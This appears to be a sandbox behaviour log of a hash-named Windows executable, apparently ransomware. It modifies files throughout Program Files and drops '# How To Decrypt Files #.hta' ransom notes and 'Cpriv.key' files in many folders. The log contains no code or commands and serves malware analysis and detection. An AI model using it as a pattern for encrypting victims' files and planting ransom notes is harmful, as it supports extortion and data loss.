de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Microsoft.BusinessData.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Rectangles\NavigationRight_SelectionSubpicture.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPBluHandle.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BL00270_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\OutlookAutoDiscover\SBCGLOBAL.NET.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_rainy.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\en-US\css\picturePuzzle.css de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\BOLDSTRI\BOLDSTRI.ELM de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.swt.theme.nl_ja_4.4.0.v20140623020002.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH01247U.BMP de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\GrayCheck.css de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\fa\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\bbc_co_uk.luac de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\settings_corner_bottom_left.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\ink\en-US\boxed-split.avi de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0341653.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-lib-profiler-charts.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\core\locale\com-sun-tools-visualvm-modules-startup_ja.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD01151_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0102762.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\LINES\BD21319_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\requests\playlist_jstree.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.felix.gogo.command_0.10.0.v201209301215.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.lucene.analysis_3.5.0.v20120725-1805.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-compat.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN04117_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD00448_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0341448.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE02285_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\flower_settings.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\ResetAssert.vssx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\META-INF\eclipse.inf de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\MediaCenter.Gadget\images\Gadget_Star_Empty.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE02267_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\hint_up.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-awt.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0187839.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Media Player\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\images\item_hover_flyout.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jre7\lib\security\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FormsHomePageStyle.css de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Document Themes 14\Theme Effects\Foundry.eftx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\BriefcaseIcon.jpg de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\SAMPLES\SOLVSAMP.XLS de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\tile_bezel.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-waxing-gibbous.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\2d.x3d de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-openide-loaders.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099158.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\settings_right_disabled.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152890.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0341738.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\PDIR12F.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\bin\plugin2\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\triggerConstraints.exsd de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0105328.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\modern_h.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\System\Ole DB\sqlxmlx.rll de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\Notes_loop_PAL.wmv de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-lib-profiler-charts.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\81.0.4044.129\Locales\ca.pak de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0199805.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\plugins\visualization\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0291794.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\microsoft shared\Stationery\GreenBubbles.jpg de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\BLUECALM\BLUECALM.ELM de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\epl-v10.html de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FormsTemplates\Track Issues.fdt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\DGTEAR.DPV de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AMT\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\Scene_loop.wmv de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.renderers.swt.nl_zh_4.4.0.v20140623020002.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107158.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\images\bNext-disable.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\System\Ole DB\sqlxmlx.rll de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\epl-v10.html de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\dialogs\stream_window.html de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\QP.DPV de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\ug\LC_MESSAGES\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolIcons\TOOLICON.ICO de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\OUTLOOK_K_COL.HXK de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\bg_OliveGreen.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Lime\TAB_ON.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\ProjectTool\Project Report Type\Basic\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Templates\1033\Access\WSS\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\81.0.4044.129\Locales\da.pak de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\ink\en-US\correct.avi de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\AXIS\THMBNAIL.PNG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-windows_ja.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Swirl\header.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_gray_cloudy.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.directorywatcher_1.1.0.v20131211-1531.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.win32.nl_zh_4.4.0.v20140623020002.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\rectangle_highlights_Thumbnail.bmp de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0186360.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\TN00014_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\LOOKUP.DAT de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR46B.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\ink\zh-TW\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Office Setup Controller\Proof.en\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0234131.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\QUERIES\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\144DPI\(144DPI)notConnectedStateIcon.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\license.html de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-windows_ja.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107302.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Document Themes 14\Apothecary.thmx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD10297_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\QuickStyles\Default.dotx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Office Setup Controller\Office.en-us\OfficeMUI.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0090781.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\COPYING.txt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\dialogs\error_window.html de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Media Player\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolIcons\OnLineBusy.ico de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Mozilla Firefox\gmp-clearkey\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\PDIR27F.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\FORMS\1033\RESENDL.ICO de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\SectionHeading.jpg de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Mozilla Firefox\browser\VisualElements\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Cartridges\Sybase.xsl de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\cmm\GRAY.pf de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\LINES\BD21332_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD10254_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\en-US\css\settings.css de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\Stationery\Stucco.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\LayeredTitles\203x8subpicture.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\ERROR.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-multitabs_ja.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099152.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0341475.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\Attachments.jpg de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\requests\status.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Media Player\Skins\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Microsoft Visual Studio 8\VSTA\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\rectangle_babypink_Thumbnail.bmp de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00170_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\lib\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\CPU.Gadget\drag.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Templates\1033\Access\WSS\107.accdt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\sk\LC_MESSAGES\vlc.mo de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\81.0.4044.129\Locales\lt.pak de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\TexturedBlue.css de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\DGMARQ.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0384862.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\InfoPathWelcomeImage.jpg de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Media Player\Media Renderer\connectionmanager_dmr.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\OFFICE14\1033\MSOINTL.REST.IDX_DLL de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7\1033\VBUI6.CHM de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBWZINT.REST.IDX_DLL de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\ca\LC_MESSAGES\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\microsoft shared\VSTO\10.0\# How To Decrypt Files #.hta 